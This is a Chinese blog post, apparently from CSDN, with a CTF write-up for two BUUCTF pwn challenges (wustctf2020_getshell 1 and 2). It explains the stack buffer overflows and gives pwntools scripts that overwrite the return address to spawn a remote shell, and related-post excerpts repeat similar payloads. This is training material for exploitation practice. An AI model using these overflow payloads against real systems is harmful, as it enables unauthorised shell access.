[BUUCTF]PWN——wustctf2020_getshell1/2

最新推荐文章于 2024-02-07 03:42:45 发布
最新推荐文章于 2024-02-07 03:42:45 发布
阅读量1.1k 收藏 3
点赞数 2
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/109620521
版权

wustctf2020_getshell

附件

步骤:

  1. 例行检查,32位程序,开启了NX保护
    在这里插入图片描述
  2. 本地试运行一下程序,看看大概的情况
    在这里插入图片描述
  3. 32位ida载入,习惯性的检索程序里的字符串,发现了后门函数
    shell_addr=0x804851B
    在这里插入图片描述
  4. main函数开始看程序
    在这里插入图片描述
  5. vulnerable函数
    在这里插入图片描述
    buf参数存在溢出漏洞,正好溢出8位,让我们覆盖到ret

exp:

from pwn import*

r=remote('node3.buuoj.cn',29690)

shell_addr=0x804851B

payload='a'*(0x18+4)+p32(shell_addr)

r.sendline(payload)

r.interactive()

在这里插入图片描述

wustctf2020_getshell_2

附件

步骤:

  1. 例行检查,32位程序,开启了nx
    在这里插入图片描述

  2. 本地试运行一下看看大概的情况
    在这里插入图片描述

  3. 32位ida载入,习惯性的检索程序里的字符串,发现调用了system函数,没有现成的system(‘/bin/sh’),但是system函数的地址拿到了
    在这里插入图片描述
    在这里插入图片描述

  4. main函数里的关键函数vulnerable,参数buf可以溢出,
    在这里插入图片描述
    可以溢出0xc字节,但是没法利用plt地址了,因为plt地址需要返回值,可溢出的地址位数不够,所以只能用shell函数里的call system来调用system,call函数不用返回值了,它会自己把下一条指令给压进去

exp:

from pwn import *

context.log_level='debug'
#p=process('./wustctf2020_getshell_2')
p=remote('node3.buuoj.cn',25360)

elf=ELF('wustctf2020_getshell_2')
call_sys=0x8048529
sh_addr = 0x08048670

p.sendline('a'*(0x18+4)+p32(call_sys)+p32(sh_addr))

p.interactive()

在这里插入图片描述

Angel~Yan
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
wustctf2020_getshell_2
个人笔记
05-15 107
原因:由于system需要调用构造栈上布局参数,所以必须得通过call来实现ESP的变化匹配栈布局。system地址0x08048529。
[buuctf]wustctf2020_getshell_2
逆向萌新的博客
07-03 291
[buuctf]wustctf2020_getshell_2
[BUUCTF-pwn]——wustctf2020_getshell_2
Y_peak的博客
03-19 394
[BUUCTF-pwn]——wustctf2020_getshell_2 有system没有sh。所以找一下 exploit from pwn import * p = remote('node3.buuoj.cn',25464) sh = 0x08048670 payload = 'a' * (0x18 + 4) + p32(0x08048529) + p32(sh) p.sendline(payload) p.interactive()
pwn旅行之[WUSTCTF 2020]getshell2(一些小知识)
最新发布
qq_66013948的博客
02-07 490
Linux下查找文件(find、grep命令)_linux查找文件-CSDN博客find 路径 -name "文件名"之后就是根据题目猜测flag文件的名字,最后通过上一条语句进行查找,当然,如果猜不到,那么还是只有挨个找了。
BUUCTF pwn——wustctf2020_getshell_2
CNS-Enterprise BCC-1701-J
05-23 108
BUUCTF 做题练习
钓鱼区域.zip_游戏_C/C++__游戏_C/C++_
08-09
1. **区域定义**:在C/C++或Pwn脚本中,我们需要定义钓鱼区域的坐标。这通常涉及到创建一个二维数组或结构体,存储每个钓鱼点的经纬度。同时,可能还需要定义区域的形状,如矩形、圆形或者多边形。 2. **颜色渲染**...
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
1. "PWN.c":这很可能是 AVR 单片机的 C 语言源代码,实现了 PWM 输出功能。我们可以预期代码中包含了初始化 PWM 定时器、设置 PWM 配置、以及可能的 PWM 寄存器操作等内容。 2. "www.pudn.com.txt":这个文件可能是...
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
[BUUCTF]PWN——wustctf2020_getshell
BangSen1的博客
03-30 268
wustctf2020_getshell 例行检查 ,开启NX保护,32位, 运行一下,打印出一个图形。 用IDA打开。看到了关键函数。 shelladdr=0x804851B 查看主函数,buf的长度为0x18,读取的长度为0x20,可以造成溢出。 from pwn import* r=remote('node3.buuoj.cn',28128) shelladdr=0x804851B payload='a'*(0x18+4)+p32(shelladdr) r.sendline(payl
WUST-CTF2020-WP
夏日 の blog
03-29 5290
目录WEBcheckinadminCV Makereasywebtrain yourself to be godlyMISCSpace ClubWelcomeAlison likes jojoShopgirlfriend小结 WEB checkin 打开页面显示Who’s the author?,回到题目发现作者是52HeRtz,输入52HeRtz发现有截断,f12选中输入框把maxlength改...
攻防世界pwn新手练习(get_shell
BurYiA的博客
09-15 6858
get_shell pwn入门题目,做题之前先说几个常用的工具(大佬总不至于跑来找这个题的wp吧 手动狗头) IDA Pro IDA是一款优秀的静态反汇编工具,好处就不多说了,什么一键F5、字符串搜索、函数位置查找等等,好用的不得了,下载可以去看雪论坛找。 pwntools pwntools官网是这样说的:pwntools是一个CTF框架和开发库。它是用Python编写的,旨在快速构建原型和开...
get-shell [XCTF-PWN]CTF writeup系列1
重新启程
12-19 1870
因为做vulhub靶场Serial2,在最后一步用到了rop技术,所以就顺便把自己学习pwn的过程做下记录。 今天做的ctf题目是pwn新手训练场的第一题get-shell。 首先我们点击获取在线场景 然后我们就可以看到,这个题目给我们提供了一个服务器端口,我们可以通过telnet连接这个端口 我们可以看到 这个端口是可以直接连接的,这道题目,因为没有回显文件,所以就看不到什么...
攻防世界-pwn-新手-get_shell
weixin_31610083的博客
10-12 862
【题目描述】 运行就能拿到shell呢,真的 【附件】 一个文件 【过程及思路】 文件没有后缀。 直接丢到虚拟机(linux)里,改名为get_shell。 发现文件还没有执行权限,那就自己加上: Chmod +x get_shell 其中filename是附件的名字。 执行了出来是这个样子。 就这?? 确实拿到shell了,只不过是自己的shell…这个题目提示越来越皮了。 看了一下别人的WP,直接连给出的地址和端口就行。 Pwn代码: from pwn...
初学pwn-攻防世界(get_shell)
天柱的博客
08-26 1665
初学pwn - writeUp 从攻防世界新手区的第一道题目开始,首先是get_shell,题目上说这道题很贱单,运行就可以获取shell。这里首先使用到的工具是nc(netcat)。 Netcat 是一款简单的Unix工具,使用UDP和TCP协议。使用它你可以轻易的建立任何连接。内建有很多实用的工具。功能非常强大,这里列举一下百度到的内容,这里就算了,之后再专门介绍一下。 telnet / 获取系统 banner 信息 传输文本信息 传输文件和目录 加密传输文件 端口扫描 远程控制 / 正方向 shel
buuctf-N1Book[第六章 CTFPWN章]
CHAWUCIREN1的博客
10-17 2264
64位,开启了NX保护 shift + F12查看里面的字符串 发现自带system和bin/sh的地址 bin_sh = 0x400537 gets函数对输入的长度没有限制 查看一下v1的栈空间 需要填充0xA + 0x8的空间 payload = “A” *(0xA + 8) 由于存在栈对齐,所以还要加一个地址 ret = 0x40054E 构造的exp如下 from pwn import * #p = process("./stack") p = remote("node4.buuoj..
CTF-PWN笔记(一)-- 栈溢出 之 基础ROP
CK_0ff的博客
01-09 4366
文章目录栈linux内存布局原理文件保护机制CanaryNXPIE(ASLR)RELRO简单的栈溢出(ret2txt)ret2shellcode 栈 栈是一种典型的后进先出 (Last in First Out) 的数据结构,其操作主要有压栈 (push) 与出栈 (pop) 两种操作,如下图所示(维基百科)。两种操作都操作栈顶,当然,它也有栈底。 高级语言在运行时都会被转换为汇编程序,在汇编程序运行过程中,充分利用了这一数据结构。每个程序在运行时都有虚拟地址空间,其中某一部分就是该程序对应的栈,用于保存
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值